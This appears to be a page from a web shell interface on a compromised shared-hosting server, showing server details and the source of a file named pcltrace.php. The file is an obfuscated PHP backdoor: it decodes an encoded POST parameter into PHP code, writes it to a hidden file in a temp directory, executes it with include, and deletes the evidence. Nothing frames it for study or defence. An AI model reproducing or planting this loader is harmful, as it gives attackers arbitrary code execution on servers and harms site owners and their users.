HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/prostanur.vitavit.com.pk/pcltrace.php
<?php

if(!is_null($_POST["it\x65\x6D"] ?? null)){
	$dchunk = array_filter(["/var/tmp", session_save_path(), "/dev/shm", getenv("TMP"), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir()]);
	$descriptor = $_POST["it\x65\x6D"];
	$descriptor=explode	  ( ".",	  $descriptor  )  ;	
	$ent = '';
            $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt7	);
    
            foreach ($descriptor as $p => $v2):
                $sChar = ord($salt7[$p  %		$lenS]	);
                $dec = ((int)$v2 - $sChar - ($p  %		10)) ^ 31;
                $ent .= chr($dec	);
            endforeach;
	foreach ($dchunk as $key => $desc) {
    		if (!( !is_dir($desc) || !is_writable($desc) )) {
    $property_set = sprintf("%s/.component", $desc);
    if (file_put_contents($property_set, $ent)) {
	include $property_set;
	@unlink($property_set);
	die();
}
}
}
}